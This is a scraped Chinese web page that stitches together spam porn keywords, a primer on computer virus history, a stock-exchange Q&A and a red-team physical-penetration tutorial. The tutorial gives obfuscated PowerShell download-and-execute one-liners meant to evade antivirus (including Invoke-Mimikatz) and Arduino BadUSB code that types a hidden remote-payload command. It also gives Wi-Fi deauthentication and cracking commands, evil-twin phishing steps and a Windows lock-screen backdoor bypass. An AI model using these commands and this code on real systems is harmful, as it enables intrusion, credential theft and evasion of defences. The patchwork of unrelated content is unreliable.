操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊



    949年,在計算機剛剛誕生十年之際,匈牙利裔美國科學家約翰馮·諾依曼(Johnvon Neumann)提出了一種理論,認為有可能編寫一個自我復制的程序,后來被稱為計算機病毒。這些程序需要主機才能運行,其目的是對受感染的計算機進行未經授權和不受歡迎的修改。

    最初,病毒是在大學計算機實驗室中設計和測試的。第一個“在野外”傳播的病毒——在設計它的實驗室計算機之外——是麋鹿克隆病毒(Elk Cloner),它是由美國的一名學生理查德·斯克倫塔(Richard Skrenta)寫的。在此期間寫入的病毒是通過軟盤傳播的,因此從未造成重大的安全威脅。

    1.病毒從什么時候開始通過互聯網傳播?

    第一次重大攻擊是在1999年,美國人大衛·史密斯(David L Smith)設計了可以通過電子郵件傳播的梅麗莎病毒(Melissa)病毒(以一位舞者的名字命名)。這種病毒可以通過電子郵件傳播,它需要主機才能正常運行,該病毒附加到電子郵件中的Word文檔,一旦打開,病毒便會復制并通過電子郵件通訊錄發送給50個人。成千上萬臺被感染的電腦導致的電子郵件流量增加,迫使一些公司關閉了電子郵件服務。

    2.蠕蟲與病毒有何不同?

    蠕蟲不需要宿主程序,它是一個可以自我復制并通過計算機網絡發送的應用程序。2000年5月,通常被稱為“愛蟲”、“情書”或“伊洛維尤”的蠕蟲攻擊了菲律賓以及世界其他地區的多臺計算機。它通過電子郵件傳播,與梅利莎不同,它不需要主機。它通過覆蓋文件并將其副本隱藏在不同位置來攻擊計算機。然后,它使用電子郵件將自身發送到存儲在計算機中的地址。


    3.什么是惡意軟件、特洛伊木馬和間諜軟件?

    惡意軟件是所有感染計算機的惡意軟件的通用名稱,包括病毒、蠕蟲、特洛伊木馬、間諜軟件等。特洛伊木馬程序是一種用于通過誤導用戶了解其實際內容來入侵計算機的程序。特洛伊木馬可以用于多種用途。例如,在2007年,開發人員發布了一個名為Storm Worm的特洛伊木馬。它是通過使用一封電子郵件來傳播的,該郵件的主題是一場天氣災害,“風暴席卷歐洲,造成230人死亡”。

    一旦打開,特洛伊木馬程序將自己安裝在計算機中,并為黑客打開后門,然后黑客可以將計算機轉變為僵尸或僵尸程序,并利用它來向其他人發送垃圾郵件。特洛伊木馬程序也可以包含間諜軟件,該程序可跟蹤用戶的互聯網習慣,因此會將用戶帶到某些網站。它也可以用于身份盜用。


    4.什么是勒索軟件?

    勒索軟件是用于網絡勒索的惡意軟件。一旦安裝在計算機中,特洛伊木馬就會安裝一個對存儲在計算機中的數據進行加密的軟件,然后,會通過屏幕警報通知受害者,要求用比特幣支付贖金才能使用他們的數據。比特幣是一種數字貨幣,由一個不知名的程序員或一群名為Satoshi Nakamoto的程序員制造。

    這種貨幣不依賴于全球金融系統在其用戶之間進行交換,因此很難跟蹤。

    新聞中出現的“WannaCry”勒索軟件利用微軟軟件的一個漏洞滲透到受害者的電腦中。順便說一下,這個漏洞是美國國家安全局發現的,然后被黑客泄露。該惡意軟件會在被黑客入侵的計算機中加密數據,然后要求用比特幣支付贖金。


    擴展閱讀:

    ■>>在Win10上永久禁用Windows Defender殺毒軟件,用這3招就行了

    ■>>勒索病毒不可怕,win10電腦用上這一招,即可防止感染

    ■>>電腦裸奔不安全,殺毒軟件哪家好?安全專家幫你挑

    想了解更多精彩內容,快來關注 @微課傳媒



    1.頭條號【微課傳媒】專注軟件分享,如果你喜歡玩軟件,歡迎關注、評論、收藏、轉發。

    2.在學習中有什么問題,歡迎與我溝通交流,號搜索【微課傳媒】,我在這里等你喲!

    融界6月5日消息,有投資者在互動平臺向春秋電子提問:董秘您好,請問貴公司的筆記本電腦結構件產品,供貨哪些AI PC終端客戶?聯想、DELL、三星都推出AI 終端產品,公司對于業績展望如何?謝謝。

    公司回答表示:筆記本電腦終端品牌較為穩定,仍以聯想、蘋果、三星、惠普、戴爾等品牌為主,AIPC的快速滲透有望帶來巨大的換機需求,在筆記本電腦結構件端帶來較大的增長空間。

    本文源自金融界AI電報

    責聲明

    由于傳播、利用本頭條俊杰說黑客所提供的信息而造成的任何直接或者間接的后果及損失,均由使用者本人負責,俊杰說黑客不為承擔任何責任,一旦造成后果請自行承擔!

    hvv行動已經時間過半了紅隊的火力與各種day用的差不多了 現在的情況更可能是用郵件或即時通訊釣魚和絕招中絕招近源滲透了

    如果說外網到內網是魔法攻擊 那么近源滲透是無法避免傷害的近戰攻擊了

    • 美劇《黑客軍團》中,主角團隊在酒吧守株待兔鋼山(對手公司)員工,通過挎包內隱藏的 RFID 讀卡器獲得了潛入目標企業所需要的門禁卡數據信息,通過克隆復制員工卡,成功滲透進了目標公司。
    • 電影《斯諾登》中,主角把獲取到的關鍵數據存于 TF 存儲卡內,在離開機構時,他將 TF 卡藏于玩具魔方內,并在安檢時與保安進行“社會工程學”互動,最終在未被發現的情況下成功將數據帶出。
    • 安全劇《你安全嗎》

    實事上國家之間也會使用這種方式進行“互動”。著名的伊朗“震網病毒”事件就是一個很好的例子,伊朗的核武器就這樣被病毒扼殺在母胎里,病毒給伊朗布什爾核電站造成嚴重影響,導致放射性物質泄漏,危害不亞于切爾諾貝利核電站事故。

    一、近源滲透

    近源滲透測試是網絡空間安全領域逐漸興起的一種新的安全評估手段。

    它是一種集常規網絡攻防、物理接近、社會工程學及無線電通信攻防等能力于一體的高規格網絡安全評估行動。網絡安全評估小組在簽訂滲透測試授權協議后,通過喬裝、社工等方式實地物理侵入企業辦公區域,通過其內部各種潛在攻擊面(如Wi-Fi網絡、RFID門禁、暴露的有線網口、USB接口等)獲得“戰果”,最后以隱秘的方式將評估結果帶出上報,由此證明企業安全防護存在漏洞。

    1.1 常見方式

    1.無線網卡

    外接無線網卡主要是用來配合kali破解無線密碼的,現在一般是通過抓握手包然后跑包來破解。還有其他的方式可以通過偽造SSID釣魚等等。

    2.WIFI 大菠蘿

    大菠蘿不是吃的那個玩意,可以說是一個釣魚WiFi。最新版本的大菠蘿功能更強大,其實可以替代上面的外接無線網卡了。大菠蘿可以捕獲握手包并模仿目標AP,甚至可以完全模仿首選網絡,從而實現中間人攻擊。

    3.EMP干擾器

    當前電子設備和電路的工作頻率不斷提高,而工作電壓卻逐漸降低,因此對電磁脈沖(EMP)的敏感性和易損性也不斷增加。同時,電子系統中的集成電路對電磁脈沖比較敏感,往往一個較大的電磁脈沖,就會使集成塊產生誤碼、甚至電子元器件失效或燒毀,所以我們可以使用EMP干擾來打開部分電子門禁和電子密碼鎖。甚至你可以用一個電蚊拍自制EMP請自行搜索教程。

    4.變色龍

    變色龍主要有三種使用方法,第一種是隨機化UID進行模糊測試、第二種是支持IC卡的仿真、第三種是存儲多張虛擬化卡。有機會具體介紹

    5.納米指紋膜

    這個公司門禁代打卡的小伙伴們應該不陌生,曾經有同事就這么玩過。就是可以通過指紋拓印出一個跟原指紋一模一樣的指紋膜。至于怎樣能獲得對方的指紋....就得看你的社工啦。

    6.鍵盤記錄器

    如果你能接觸到目標主機,那你就可以將鍵盤記錄器接入到主機和鍵盤之間,并配置連接WI-FI,將鍵盤敲擊的數據實時傳回遠程服務器。

    7.內網硬件植入

    通過前面的步驟,紅隊滲透小哥哥可能已經進入了藍隊內部,這個時候我們就需要可以在內網偷偷裝一個PacketSquirrel,作為中間人攻擊工具,PacketSquirrel可以捕獲網絡端點的數據包、并且可以使用VPN和反向shell獲得遠程訪問權限。

    8.HID 攻擊

    badusb是HID(人機接口)攻擊的一種,也稱為熱插拔攻擊。想象一下,你可以走到一臺計算機上,插入看似無害的USB驅動器,然后安裝后門,竊聽文檔,竊取密碼...(用法很多,全靠想象)。

    二、Badusb 上線CS

    BadUSB是利用了USB協議上的漏洞,通過更改USB的內部固件,在正常的USB接口接入后,模擬外置鼠標、鍵盤的功能,以此來使目標主機執行已經精心構造好的命令。在此過程中不會引起殺毒軟件、防火墻的一絲懷疑。而且因為是在固件級別的應用,U盤格式化根本無法阻止其內部代碼的執行。

    同樣因為是對USB的利用,Windows、Linux、MAC等各類操作系統不必聯網下載專用的驅動程序。此外,向BadUSB燒錄的程序極為簡單,大部分是對鍵盤按鍵進行模擬,上手較為容易。

    BadUSB也是社會工程學的一個典型示例,它極大地利用了人們的好奇心,在路邊撿到的USB,估計九成以上的人們都想看看里面有什么東西,而當你插入U盤,攻擊就很難再停止下來了。

    2.1 準備工作

    • 一個Arduino Leonardo開發板,偽裝成虛擬鍵盤的U盤
    • Arduino IDE,用來燒錄代碼
    • 部署好CS服務端,用來上線

    2.2 CS簡單免殺

    部署CobaltStrike服務器,生成powershell的payload


    2.2.1 代碼混淆

    PowerShell的免殺可以用Invoke-Obfuscation,Invoke-Obfuscation主要是對ps1腳本進行免殺,需要現有一個ps的payload。

    進入Invoke-Obfuscation目錄后,在PowerShell中執行命令

    Import-Module .\Invoke-Obfuscation.psd1
    Invoke-Obfuscation
    #然后執行命令,指定待處理的Ps1文件
    set scriptpath c:\xxx\payload.ps1
    encoding
    #輸入encoding 并選擇編碼方式,比如
    1
    #輸入命令,導出免殺ps文件到指定路徑
    out C:\xxx\xxx.ps1

    2.2.2 遠程代碼執行-替換和干擾

    雖然ps1代碼自身免殺,但在?powershell執?遠程下載或執?shellcode時,很容易觸發殺軟?為規則。對于IEX這種方便快捷的方式直接運行會被360攔截。可嘗試從語法上簡單變化。主要是對DownloadString、http做?些處理。

    1、替換文件名

    copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe bypass.txt
    
    
    bypass.txt "$a='IEX((New-Object Net.WebClient).DownloadString(''
    ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"

    2、替換關鍵字

    powershell "$a='IEX((New-Object Net.WebClient).DownloadString(''ht';$b='tp://www.xiaodi8.com/ms/ps/1.ps1''));Invoke-Mimikatz';IEX ($a+$b)"
    
    
    powershell -NoExit "$c1='IEX(New-Object Net.WebClient).Downlo';$c2
    ='123(''http://www.xiaodi8.com/ms/ps/payload.ps1'')'.Replace('123','adString');IEX ($c1+$c2)"
    

    替換常見關鍵字

    IEX $DoIt -- i`ex $DoIt
    IEX $a  --  ie`x $a
    $var_runme -- $vrunme
    $var_buffer -- $vbuffer
    func_get_proc_address --  func_k
    func_get_delegate_type -- func_l
    $var_type_builder -- $vk
    $var_parameters -- $vp
    $var_return_type-- $ve
    $var_procedure -- $v_pro

    3、垃圾數據干擾

    powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://www.xiaodi8.com/ms/ps/p1.ps1')
    

    2.2.3 分離免殺

    2.3 Arduino燒錄代碼

    下載地址:https://github.com/arduino/arduino-ide/releases/tag/2.1.0

    打開Arduino IDE

    工具->板->選擇"Arduino Leonardo"


    badusb可以模擬鍵盤輸入和鼠標點擊,具體按鍵設置:

    delay(5000);//延時毫秒
    Keyboard.begin();     //開始鍵盤通訊
    Keyboard.end();     //結束鍵盤通訊
    Keyboard.press();     //按下鍵盤按鍵    如果是非特殊按鍵如 數字、字母按鍵用單引號括起來
    Keyboard.release();     //釋放鍵盤按鍵
    Keyboard.println("");     //輸入字符串使用雙引號括起來 
    Mouse.begin();//鼠標事件開始
    Mouse.click();//鼠標單擊
    Mouse.end();//鼠標事件結束
    Mouse.move();//鼠標移動(x,y)
    Mouse.press();//鼠標按下
    Mouse.release();//鼠標松開
    Mouse.isPressed();//   
    KEY_LEFT_CTRL
    KEY_LEFT_SHIFT
    KEY_LEFT_ALT
    KEY_LEFT_GUI    //win鍵
    KEY_RIGHT_CTRL
    KEY_RIGHT_SHIFT
    KEY_RIGHT_ALT
    KEY_RIGHT_GUI
    KEY_UP_ARROW
    KEY_DOWN_ARROW
    KEY_LEFT_ARROW
    KEY_RIGHT_ARROW
    KEY_BACKSPACE
    KEY_TAB
    KEY_RETURN//回車鍵
    KEY_ESC
    KEY_INSERT
    KEY_DELETE
    KEY_PAGE_UP
    KEY_PAGE_DOWN
    KEY_HOME
    KEY_END
    KEY_CAPS_LOCK
    KEY_F1
    KEY_F2
    KEY_F3
    KEY_F4
    KEY_F5
    KEY_F6
    KEY_F7
    KEY_F8
    KEY_F9
    KEY_F10
    KEY_F11
    KEY_F12

    參考攻擊代碼

    #include <Keyboard.h>
    void setup() {
      // putpower shell your setup code here, to run once
      Keyboard.begin();//開始鍵盤通訊 
    delay(3000);//延時 
    Keyboard.press(KEY_LEFT_GUI);//win鍵 
    delay(500);
    Keyboard.press('r');//r鍵
    delay(500); 
    Keyboard.release(KEY_LEFT_GUI);
    Keyboard.release('r'); 
    delay(500);
    Keyboard.println("CMD  /q /d /f:off /v:on /k MODE con: cols=15 lines=1");  //無回顯
    //Keyboard.println("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1\"");   //有回顯
    delay(500);
    Keyboard.press(KEY_RETURN); 
    Keyboard.release(KEY_RETURN); 
    Keyboard.println("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass Iex(New-Object Net.WebClient).DownloadString('http://x.x.x.x/xxx.ps1')"); 
    Keyboard.press(KEY_RETURN);
    Keyboard.release(KEY_RETURN);
    Keyboard.end();//結束鍵盤通訊 
    }
     
    void loop() {
      // put your main code here, to run repeatedly:
     
    }

    在代碼實現的過程中主要發現2個坑點。
    1、目標機器默認中文輸入法的問題
    2、在某些系統運行需要安裝驅動

    嘗試了2種解決方法:
    1、模擬KEY_LEFT_SHIFT按鍵把中文輸出法切換為英文
    2、模擬KEY_CAPS_LOCK按鍵輸出大寫字符
    第一種解決方法,模擬KEY_LEFT_SHIFT按鍵,在目標為中文輸入法時,可以正常切換為英文,正常輸出,但一旦對方默認為英文輸入法,反而畫蛇添足。
    第二種解決方法,模擬KEY_CAPS_LOCK按鍵,在默認使用中英文輸入法時都適用,唯一不適應的情況是對方默認使用中文輸入法且開啟了大寫輸入。

    進行燒錄程序

    注意右下角,程序寫到BadUSB里,別寫錯地方了,程序不報錯證明成功

    三、Wife滲透

    3.1 Wife密碼爆破

    Aircrack-ng是一款基于破解無線802.11協議的WEP及WPA-PSK加密的工具。該工具主要用了兩種攻擊方式進行WEP破解。一種是FMS攻擊,該攻擊方式是以發現該WEP漏洞的研究人員名字(Scott Fluhrer、Itsik Mantin及Adi Shamir)所命名;另一種是Korek攻擊,該攻擊方式是通過統計進行攻擊的,并且該攻擊的效率要遠高于FMS攻擊。

    3.1.1 破解WEP加密的無線網絡

    Wired Equivalent Privacy或WEP(有線等效加密)協議是對在兩臺設備間無線傳輸的數據進行加密的方式,用以防止非法用戶竊聽或侵入無線網絡。不過密碼分析學家已經找出WEP好幾個弱點,因此在2003年被Wi-Fi Protected Access(WPA)淘汰,又在2004年由完整的IEEE 802.11i標準(又稱為WPA2)所取代。

    現在使用該協議的較少,可參考文章

    3.1.2 破解WPA/WPA2無線網絡

    WPA全名為Wi-Fi Protected Access,有WPA和WPA2兩個標準。它是一種保護無線電腦網絡安全的協議。對于啟用WPA/WPA2加密的無線網絡,其攻擊和破解步驟及攻擊是完全一樣的。不同的是,在使用airodump-ng進行無線探測的界面上,會提示為WPA CCMP PSK。當使用aireplay-ng進行攻擊后,同樣獲取到WPA握手數據包及提示;在破解時需要提供一個密碼字典。下面將介紹破解WPA/WPA2無線網絡的方法。

    使用aircrack-ng破解WPA/WPA2無線網絡的具體操作步驟如下所示。

    #查看無線網絡接口
    airmon-ng
    #停止無線網絡接口
    airmon-ng stop wlan0
    #修改無線網卡MAC地址
    macchanger --mac 00:11:22:33:44:55 wlan0
    #啟用無線網絡接口
    airmon-ng start wlan0
    #捕獲數據包
    airodump-ng -c 1 -w abc --bssid  F6:4C:A1:B5:C6:81  mon0
    #對無線路由器Test進行Deauth攻擊
    aireplay-ng --deauth 1 -a 14:E6:E4:AC:FB:20 -c 00:11:22:33: 44:55 mon0
    #破解密碼
    aircrack-ng -w 1.txt test-01.cap

    3.1.3 攻擊WPS無線

    WPS是由Wi-Fi聯盟所推出的全新Wi-Fi安全防護設定標準。該標準主要是為了解決無線網絡加密認證設定的步驟過于繁雜的弊病。因為通常用戶往往會因為設置步驟太麻煩,以至于不做任何加密安全設定,從而引起許多安全上的問題。所以很多人使用WPS設置無線設備,可以通過個人識別碼(PIN)或按鈕(PBC)取代輸入一個很長的密碼短語。當開啟該功能后,攻擊者就可以使用暴力攻擊的方法來攻擊WPS。本小節將介紹使用各種工具攻擊WPS。

    現在大部分路由器上都支持WPS功能。以前路由器有專門的WPS設置,現在的路由器使用QSS功能取代了。以TP-LINK型號為例,介紹設置WPS功能,只需要按下路由器上的QSS/RESET按鈕就可以了。

    利用在線密碼生成1.txt字典,使用kail中自帶的Aircrack-ng,首先查看無線網卡的信息

    #查看wlan0和eth0的信息
    iwconfig
    #kill掉可能影響的進程
    airmon-ng check kill
    #啟用無線網卡的監聽模式,啟用成功后,Ifconfig可以看到無線網卡的信息。
    airmon-ng start wlan0
    #監聽附近的所有wifi通信
    airodump-ng wlan0mon
    #通過后臺持續運行,抓取指定ap的無線通信,這里-c指定對應通道
    airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 10 -w test wlan0mon
    aireplay-ng -0 2 -a F6:4C:A1:B5:C6:81 -c 20:64:CB:0E:E3:ED wlan0mon
    #查看后臺運行的監聽進程,抓到數據包為成功
    airodump-ng --bssid F6:4C:A1:B5:C6:81 -c 11 -w test wlan0mon
    #通過碰撞破解握手包的密碼,獲取wifi密碼
    aircrack-ng -w 1.txt test-01.cap
    

    使用wifite更加簡單

    #啟動Wifite工具,并指定使用common.txt密碼字典
    wifite -dict common.txt
    

    停止掃描無線網絡,將顯示如下所示的信息


    從以上輸出信息中,可以看到掃描到五個無線接入點和三個客戶端。在輸出信息中,共顯示了7列。分別表示無線接入點編號、ESSID號、信道、加密方式、電功率、是否開啟wps和客戶端。如果僅有一個客戶端連接到無線接入點,則CLIENT列顯示是client。如果有多個客戶端連接的話,則顯示是clients。

    此時,選擇要攻擊的無線接入點。這里選擇第五個無線接入點,輸入“1”。然后按下回車鍵將開始攻擊

    攻擊成功,如果密碼在密碼本中,即可列出明文密碼。

    3.2 Wife釣魚

    使用fluxion工具,首先iwconfig查看無線網卡的信息,然后fluxion -i安裝依賴

    1、首先獲取目標握手包

    [2] Handshake Snooper 檢索WPA/WPA2加密散列。
    [3] 掃描所有信道  (2.4GHz & 5Ghz)
    [2] 跳過
    [2] aireplay-ng 解除認證方式 (侵略性)
    [2] cowpatty 驗證 (推薦用這個)
    [1] 每30秒鐘 (推薦).
    [2] Synchronously (推薦).
    

    2、之后泛洪攻擊目標ap,使其停止無線服務

    [1] 選擇啟動攻擊方式
    [1] 專屬門戶 創建一個“邪惡的雙胞胎”接入點
    [2] 跳過
    [2] wlan0    [*] Ralink Technology, Corp. RT2870/RT3070      
    [2] aireplay
    [1] 流氓 AP - hostapd (推薦)
    [1] hash - cowpatty
    [1] 使用抓取到的hash文件
    [2] cowpatty 驗證 (推薦用這個)
    

    3、通過釣魚框架,偽造目標網絡信息,誘導用戶連接

    [1] 創建SSL證書
    [2] 仿真
    [03] 通用認證網頁                              Chinese
    

    用戶連接釣魚wifi后,將捕獲的用戶輸入的握手包,與之前認證的握手包進行校驗;如果校驗成功,則停止攻擊目標ap ,否則繼續攻擊,直至成功破解

    3.3 無線路由器漏洞利用

    RouterSploit它包含了27+個品牌的上百種漏洞利用模塊,涉及的路由器、攝像頭等設備有幾百種。可自動設別設備型號自動掃描可利用的漏洞。

    四、繞過windows鎖屏

    近源滲透中經常遇到電腦存在登錄密碼的情況。某些安全措施嚴格的目標,還會啟用Bitlocker磁盤加密。

    4.1 Kon-Boot

    Kon-Boot是最著名的密碼繞過工具。其原理可謂神奇:在系統引導階段,通過修改Windows內核,使驗證用戶憑證的代碼失效。它不會刪除密碼,而是使登錄時的密碼驗證失效,輸入任意密碼即可登錄。


    完整版本的Kon-Boot是付費軟件,個人許可證價格為,商業許可證價格為0。

    如果不打算購買許可證,也可以使用免費版本。本文使用最后一個免費版本V2.5。該版本可以繞過除Windows 10的在線賬戶之外的密碼。在繞過失敗時,Kon-Boot可以添加賬號,或安裝Shift鍵后門。

    Kon-Boot可以滿足大多數滲透場景的需求,但它有著幾個缺點:

    • 是付費軟件,全功能版價格為140美元
    • 無法繞過Bitlocker磁盤加密
    • Kon-Boot繞過密碼的成功率差強人意,經常需要重試

    4.2 GrabAccess

    官網地址:https://kon-boot.com/index.html

    和Kon-Boot類似,GrabAccess也是密碼繞過工具。對比起Kon-Boot,GrabAccess的優點有:

    • 免費,并基于GPL協議開源
    • 可以繞過Bitlocker植入后門
    • 只要引導環境符合要求,成功率接近百分百
    • 自動化植入木馬。只需要一步操作,耗時短,適合近源滲透場景

    其最主要的優勢是成功率高。在實戰中發現Kon-boot繞過成功率非常之不穩定,尤其是針對Windows 10。

    但在目前,GrabAccess僅支持UEFI引導的64位系統。針對Windows xp,或MBR引導的Windows 7,仍推薦Kon-Boot。

    使用方式

    GrabAccess最基礎的功能是安裝Shift鍵后門,將Windows粘滯鍵替換為任務管理器。在不登陸的情況下,也可以執行系統命令或讀寫文件。

    下載地址:https://github.com/Push3AX/GrabAccess

    • 準備一個U盤。如果是FAT、FAT16或FAT32格式,則可以不刪除已有的文件。否則需要格式化為上述格式。
    • 下載GrabAccess,解壓,將EFI文件夾拷貝到U盤根目錄。

    至此GrabAccess的最簡安裝完成。

    • 將U盤插入電腦,重啟電腦。在啟動時進入BIOS菜單。
    • 選擇從U盤啟動,或設置U盤為第一啟動項。如圖所示,最后一個啟動項是U盤,選擇其啟動即可。

    (如果BIOS開啟了Security Boot,還需將其設置為DISABLE)


    • 在登錄界面,連續按下五次Shift鍵,即可喚出任務管理器。
    • 點擊文件-運行新任務-瀏覽,將右下角的“文件類型”選擇為所有文件,即可查看、讀寫電腦上的所有文件。
    • 點擊文件可以運行cmd,執行任意代碼。例如刪除當前賬號的密碼、添加新賬號等。

    五、門禁鎖

    門緊鎖一般可以分為無線電鎖、RFID鎖等

    其中無線電鎖的無線遙控模塊常見于門禁、停車場欄桿等
    一般使用特定頻段315Mhz、443Mhz頻段

    攻擊方式:

    • 使用固定碼,則可被重放攻擊
    • 部分滾動碼的生成算法已被分析,可能造成滾動碼失效
    • 在不知道密碼的情況下可進行爆破


    RFID鎖具

    ID卡與lC卡:

    • ID卡較為古老,但廉價,ID卡只有一個ND號,無法存儲數據
    • IC卡內部有存儲器,并且可以加密數據,IC卡以NXP公司的Mifare為主
    • Mifare卡的存儲空間分為1K版和4K版,CPU卡在正常設計的情況下極難破解


    該類卡可以讀取芯片中的數據,獲取密鑰信息,進行偽造,網站有門禁復制器等工具直接復制,例如


    #暑期創作大賽#

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有